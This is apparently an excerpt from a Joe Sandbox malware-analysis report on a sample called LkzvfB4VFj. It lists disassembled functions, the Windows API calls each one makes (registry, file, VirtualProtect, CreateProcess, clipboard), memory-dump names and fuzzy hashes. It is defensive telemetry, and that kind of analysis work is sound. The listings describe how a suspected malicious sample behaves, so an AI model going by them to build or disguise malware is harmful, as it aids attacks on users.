                                                  Function 0040171F Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SearchPathA.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 00401733
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: PathSearch
                                                  • String ID:
                                                  • API String ID: 2203818243-0
                                                  • Opcode ID: e053cd0a5a713bcd6573213f31fe775dca372833d122c7f25a227a8b80c7c065
                                                  • Instruction ID: 99b882ef8ac932529d6fdfe3c41faefb6a71927cb26e20fd81cb329c01224dc0
                                                  • Opcode Fuzzy Hash: e053cd0a5a713bcd6573213f31fe775dca372833d122c7f25a227a8b80c7c065
                                                  • Instruction Fuzzy Hash: 93E0DF72304210EFD710DF649E49BAB37A8DF10368B20427AE111A60C2E6F89906873D
                                                  Function 00405FAB Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RegCreateKeyExA.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402C7F,00000000,?,?), ref: 00405FD4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: Create
                                                  • String ID:
                                                  • API String ID: 2289755597-0
                                                  • Opcode ID: 33f0ef72135594440bd39ae1090de480165a05d63dfabbbeebd316e266d8c237
                                                  • Instruction ID: 8c71f3c26dc4a4bf3eef9e60a583d004d00a96479e721722a8f6be6a9d57506c
                                                  • Opcode Fuzzy Hash: 33f0ef72135594440bd39ae1090de480165a05d63dfabbbeebd316e266d8c237
                                                  • Instruction Fuzzy Hash: 1CE0E6B201450ABEDF095F50DD0ED7B3B1DE704300F14452EF906D4050E6B5A9205A34
                                                  Function 00405D08 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004032FD,00000000,00000000,00403127,000000FF,00000004,00000000,00000000,00000000), ref: 00405D1C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: FileRead
                                                  • String ID:
                                                  • API String ID: 2738559852-0
                                                  • Opcode ID: da94c88c01f32db49c143d41d40f73f2c481f3bafd85dc9fd8b917d4e0158b31
                                                  • Instruction ID: 6bc3b1048b15a49576125e72cb6f14b4cec2b2626e36b687d4021167e808d8fe
                                                  • Opcode Fuzzy Hash: da94c88c01f32db49c143d41d40f73f2c481f3bafd85dc9fd8b917d4e0158b31
                                                  • Instruction Fuzzy Hash: 2BE08C3221021EABCF109E608C08EEB3B6CEF00360F048833FD54E2140D234E8209BA4
                                                  Function 00405D37 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004032B3,00000000,0041D448,000000FF,0041D448,000000FF,000000FF,00000004,00000000), ref: 00405D4B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: FileWrite
                                                  • String ID:
                                                  • API String ID: 3934441357-0
                                                  • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                  • Instruction ID: 0f83f4d47d9459a9b0ba24ed2798b341cbbd10940215494d2392ac534f962254
                                                  • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                  • Instruction Fuzzy Hash: 41E08C3220025AABCF10AFA08C04EEB3B6CEF00360F008833FA15E7050D630E8219BA8
                                                  Function 6FEB2921 Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • VirtualProtect.KERNELBASE(6FEB404C,00000004,00000040,6FEB403C), ref: 6FEB293F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92789234716.000000006FEB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6FEB0000, based on PE: true
                                                  • Associated: 00000000.00000002.92789161524.000000006FEB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000000.00000002.92789295698.000000006FEB3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000000.00000002.92789366643.000000006FEB5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6feb0000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: ProtectVirtual
                                                  • String ID:
                                                  • API String ID: 544645111-0
                                                  • Opcode ID: 9a7229a895f10aa80ee91ac7205d044796eeafe50404c8eef3d8073403b709a2
                                                  • Instruction ID: 44be42920a3611f5b4a4f6ed2456b535a5e92026bccb39c853176b63cfb52a87
                                                  • Opcode Fuzzy Hash: 9a7229a895f10aa80ee91ac7205d044796eeafe50404c8eef3d8073403b709a2
                                                  • Instruction Fuzzy Hash: A3F0AEB1908A84EECB60CF788B857053FF2BB1B364B12452FE25CD7261E33458648B13
                                                  Function 004023E0 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetPrivateProfileStringA.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 00402413
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: PrivateProfileString
                                                  • String ID:
                                                  • API String ID: 1096422788-0
                                                  • Opcode ID: b20ff68c1f91e8945650ad06eb6636fe2efcf37a6f72d7170e5f25b2e3b7c808
                                                  • Instruction ID: ec2b9ed2aa8753cc56e49b6d1f5b0ead50a941972cde74363bc07da0fbfd84e4
                                                  • Opcode Fuzzy Hash: b20ff68c1f91e8945650ad06eb6636fe2efcf37a6f72d7170e5f25b2e3b7c808
                                                  • Instruction Fuzzy Hash: 40E04630904208BAEB006FA08E09EAD3A79EF01710F20003AF9617B0D1E6B89482D72E
                                                  Function 00405F7D Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RegOpenKeyExA.KERNELBASE(00000000,?,00000000,?,?,0042A070,?,?,0040600B,0042A070,?,?,?,00000002,Call), ref: 00405FA1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: Open
                                                  • String ID:
                                                  • API String ID: 71445658-0
                                                  • Opcode ID: dcd566976f3bef00ddda20b11fb2537fa700d8cbfb920dfffbe2909342267143
                                                  • Instruction ID: 8d979316dbb681ef417a562383420c35b8ea1d7cbf1ba97b3ef1f912197d15a8
                                                  • Opcode Fuzzy Hash: dcd566976f3bef00ddda20b11fb2537fa700d8cbfb920dfffbe2909342267143
                                                  • Instruction Fuzzy Hash: 26D0EC7200460ABBDF115E90DD05FAB3B1DEB08310F044426FA05E5091D679D530AA25
                                                  Function 0040159D Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: AttributesFile
                                                  • String ID:
                                                  • API String ID: 3188754299-0
                                                  • Opcode ID: 5887674a1f5513ec9541be2dff6cbc71c684969360942c525d855edfecb85619
                                                  • Instruction ID: 936ed37629fa473271aaed7dd48578ad272974d6d3f069640798472dc64bc079
                                                  • Opcode Fuzzy Hash: 5887674a1f5513ec9541be2dff6cbc71c684969360942c525d855edfecb85619
                                                  • Instruction Fuzzy Hash: F6D01232704115DBDB10EFA59B08A9E73B5EB10325B308277E111F21D1E6B9C9469A2D
                                                  Function 00403300 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403066,?), ref: 0040330E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: FilePointer
                                                  • String ID:
                                                  • API String ID: 973152223-0
                                                  • Opcode ID: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
                                                  • Instruction ID: eadcf480fe67690f272c505b4903882a1233053cb438a9b9796e5ea94341b5dd
                                                  • Opcode Fuzzy Hash: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
                                                  • Instruction Fuzzy Hash: 25B09231140200AADA215F409E09F057B21AB94700F208424B244280F086712025EA0D
                                                  Function 00401F7B Relevance: 1.3, APIs: 1, Instructions: 37COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0040521E: lstrlenA.KERNEL32(0042A070,00000000,00424248,758423A0,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
                                                    • Part of subcall function 0040521E: lstrlenA.KERNEL32(00403233,0042A070,00000000,00424248,758423A0,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
                                                    • Part of subcall function 0040521E: lstrcatA.KERNEL32(0042A070,00403233,00403233,0042A070,00000000,00424248,758423A0), ref: 0040527A
                                                    • Part of subcall function 0040521E: SetWindowTextA.USER32(0042A070,0042A070), ref: 0040528C
                                                    • Part of subcall function 0040521E: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052B2
                                                    • Part of subcall function 0040521E: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052CC
                                                    • Part of subcall function 0040521E: SendMessageA.USER32(?,00001013,?,00000000), ref: 004052DA
                                                    • Part of subcall function 00405796: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042C098,Error launching installer), ref: 004057BF
                                                    • Part of subcall function 00405796: CloseHandle.KERNEL32(?), ref: 004057CC
                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FC0
                                                    • Part of subcall function 00406575: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406586
                                                    • Part of subcall function 00406575: GetExitCodeProcess.KERNEL32(?,?), ref: 004065A8
                                                    • Part of subcall function 00406055: wsprintfA.USER32 ref: 00406062
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                  • String ID:
                                                  • API String ID: 2972824698-0
                                                  • Opcode ID: ada5aadaf350f23a8dbf3a026041224ab9f957c4560aafed3a43088b721b475c
                                                  • Instruction ID: 93961662e530d2e5a08160df11036b73ffef590b917d11c16f189fde5a143e01
                                                  • Opcode Fuzzy Hash: ada5aadaf350f23a8dbf3a026041224ab9f957c4560aafed3a43088b721b475c
                                                  • Instruction Fuzzy Hash: 88F09032A05021EBCB20BBA15E84DAFB2B5DF01318B21423FF502B21D1DB7C4D425A6E
                                                  Function 004014D6 Relevance: 1.3, APIs: 1, Instructions: 19sleepCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • Sleep.KERNELBASE(00000000), ref: 004014E9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: Sleep
                                                  • String ID:
                                                  • API String ID: 3472027048-0
                                                  • Opcode ID: 5004c81fc86d5aad5056578f097f916dd0ceefac499e9113037a72ef071e40e2
                                                  • Instruction ID: c67a8691079fc4563931701ff3f7f14ff0a893aaeadd9329411c5994133067d8
                                                  • Opcode Fuzzy Hash: 5004c81fc86d5aad5056578f097f916dd0ceefac499e9113037a72ef071e40e2
                                                  • Instruction Fuzzy Hash: 0CD05E73B10100DBD720EBB8BAC485F77B8EB503253308837E402E2091E579C8424628
                                                  Function 6FEB1215 Relevance: 1.3, APIs: 1, Instructions: 4memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GlobalAlloc.KERNELBASE(00000040,6FEB1233,?,6FEB12CF,-6FEB404B,6FEB11AB,-000000A0), ref: 6FEB121D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92789234716.000000006FEB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6FEB0000, based on PE: true
                                                  • Associated: 00000000.00000002.92789161524.000000006FEB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000000.00000002.92789295698.000000006FEB3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000000.00000002.92789366643.000000006FEB5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6feb0000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: AllocGlobal
                                                  • String ID:
                                                  • API String ID: 3761449716-0
                                                  • Opcode ID: a68eec6213a6be78aedffe7da00236f5f326ed49f674ab24ed3fc50c9faac193
                                                  • Instruction ID: b24247958cad7187d6cfa9d114e2303738b01ba90e9a613938017bc12d081632
                                                  • Opcode Fuzzy Hash: a68eec6213a6be78aedffe7da00236f5f326ed49f674ab24ed3fc50c9faac193
                                                  • Instruction Fuzzy Hash: 18A00171944900DBDE519AE08A4BA143E22AB4B721F008041E31554194866540209B26

                                                  Non-executed Functions

                                                  Function 0040535C Relevance: 54.3, APIs: 36, Instructions: 282windowclipboardmemoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetDlgItem.USER32(?,00000403), ref: 004053BB
                                                  • GetDlgItem.USER32(?,000003EE), ref: 004053CA
                                                  • GetClientRect.USER32(?,?), ref: 00405407
                                                  • GetSystemMetrics.USER32(00000002), ref: 0040540E
                                                  • SendMessageA.USER32(?,0000101B,00000000,?), ref: 0040542F
                                                  • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405440
                                                  • SendMessageA.USER32(?,00001001,00000000,?), ref: 00405453
                                                  • SendMessageA.USER32(?,00001026,00000000,?), ref: 00405461
                                                  • SendMessageA.USER32(?,00001024,00000000,?), ref: 00405474
                                                  • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405496
                                                  • ShowWindow.USER32(?,00000008), ref: 004054AA
                                                  • GetDlgItem.USER32(?,000003EC), ref: 004054CB
                                                  • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 004054DB
                                                  • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004054F4
                                                  • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 00405500
                                                  • GetDlgItem.USER32(?,000003F8), ref: 004053D9
                                                    • Part of subcall function 004041B0: SendMessageA.USER32(00000028,?,00000001,00403FE0), ref: 004041BE
                                                  • GetDlgItem.USER32(?,000003EC), ref: 0040551C
                                                  • CreateThread.KERNEL32(00000000,00000000,Function_000052F0,00000000), ref: 0040552A
                                                  • CloseHandle.KERNEL32(00000000), ref: 00405531
                                                  • ShowWindow.USER32(00000000), ref: 00405554
                                                  • ShowWindow.USER32(?,00000008), ref: 0040555B
                                                  • ShowWindow.USER32(00000008), ref: 004055A1
                                                  • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004055D5
                                                  • CreatePopupMenu.USER32 ref: 004055E6
                                                  • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 004055FB
                                                  • GetWindowRect.USER32(?,000000FF), ref: 0040561B
                                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405634
                                                  • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405670
                                                  • OpenClipboard.USER32(00000000), ref: 00405680
                                                  • EmptyClipboard.USER32 ref: 00405686
                                                  • GlobalAlloc.KERNEL32(00000042,?), ref: 0040568F
                                                  • GlobalLock.KERNEL32(00000000), ref: 00405699
                                                  • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004056AD
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 004056C6
                                                  • SetClipboardData.USER32(00000001,00000000), ref: 004056D1
                                                  • CloseClipboard.USER32 ref: 004056D7
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                  • String ID:
                                                  • API String ID: 590372296-0
                                                  • Opcode ID: e77ccb86652fbc0499d97b80cacae04005d5d9073b444bb924cd904a6cf5059e
                                                  • Instruction ID: ad896caeff922a337f51dbee0e8d50556c939e1053927b0f1ec287220421205b
                                                  • Opcode Fuzzy Hash: e77ccb86652fbc0499d97b80cacae04005d5d9073b444bb924cd904a6cf5059e
                                                  • Instruction Fuzzy Hash: 3DA14A70900608BFDB119F61DD89EAE7FB9FB08354F50403AFA45BA1A0CB754E519F68
                                                  Function 0040460D Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 274stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetDlgItem.USER32(?,000003FB), ref: 0040465C
                                                  • SetWindowTextA.USER32(00000000,?), ref: 00404686
                                                  • SHBrowseForFolderA.SHELL32(?,00429C68,?), ref: 00404737
                                                  • CoTaskMemFree.OLE32(00000000), ref: 00404742
                                                  • lstrcmpiA.KERNEL32(Call,0042A890), ref: 00404774
                                                  • lstrcatA.KERNEL32(?,Call), ref: 00404780
                                                  • SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404792
                                                    • Part of subcall function 004057F7: GetDlgItemTextA.USER32(?,?,00000400,004047C9), ref: 0040580A
